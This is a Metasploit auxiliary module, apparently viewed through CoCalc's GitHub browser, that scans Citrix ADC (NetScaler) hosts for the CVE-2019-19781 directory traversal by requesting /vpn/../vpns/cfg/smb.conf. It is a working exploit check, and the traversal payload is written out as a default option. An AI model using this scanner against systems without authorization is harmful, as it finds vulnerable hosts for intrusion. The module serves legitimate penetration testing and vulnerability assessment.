Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/citrix_dir_traversal.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  include Msf::Exploit::Remote::HttpClient

9
  include Msf::Auxiliary::Scanner

10
  include Msf::Auxiliary::Report

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',

17
        'Description' => %q{

18
          This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC

19
          (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request

20
          /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of

21
          a "[global]" directive in smb.conf, which this file should always contain.

22
        },

23
        'Author' => [

24
          'Mikhail Klyuchnikov', # Discovery

25
          'Erik Wynter',         # Module (@wyntererik)

26
          'altonjx'              # Module (@altonjx)

27
        ],

28
        'References' => [

29
          ['CVE', '2019-19781'],

30
          ['URL', 'https://web.archive.org/web/20200111095223/https://support.citrix.com/article/CTX267027/'],

31
          ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']

32
        ],

33
        'DisclosureDate' => '2019-12-17',

34
        'License' => MSF_LICENSE,

35
        'Notes' => {

36
          'AKA' => ['Shitrix'],

37
          'Stability' => UNKNOWN_STABILITY,

38
          'Reliability' => UNKNOWN_RELIABILITY,

39
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

40
        }

41
      )

42
    )

43


44
    register_options([

45
      OptString.new('TARGETURI', [true, 'Base path', '/']),

46
      OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])

47
    ])

48
  end

49


50
  def run_host(target_host)

51
    turi = normalize_uri(target_uri.path, datastore['PATH'])

52


53
    res = send_request_cgi(

54
      'method' => 'GET',

55
      'uri' => turi

56
    )

57


58
    unless res

59
      print_error("#{full_uri(turi)} - No response, target seems down.")

60


61
      return Exploit::CheckCode::Unknown

62
    end

63


64
    unless res.code == 200

65
      print_error("#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.")

66
      vprint_error("Obtained HTTP response code #{res.code} for #{full_uri(turi)}.")

67


68
      return Exploit::CheckCode::Safe

69
    end

70


71
    if turi.end_with?('smb.conf')

72
      unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\[\s*global\s*\]/)

73
        vprint_warning("#{turi} does not contain \"[global]\" directive.")

74
      end

75
    end

76


77
    print_good("#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.")

78
    msg = "Obtained HTTP response code #{res.code} for #{full_uri(turi)}. " \

79
          "This means that access to #{turi} was obtained via directory traversal."

80
    vprint_good(msg)

81


82
    report_vuln(

83
      host: target_host,

84
      name: name,

85
      refs: references,

86
      info: msg

87
    )

88


89
    Exploit::CheckCode::Vulnerable

90
  end

91


92
end

93


94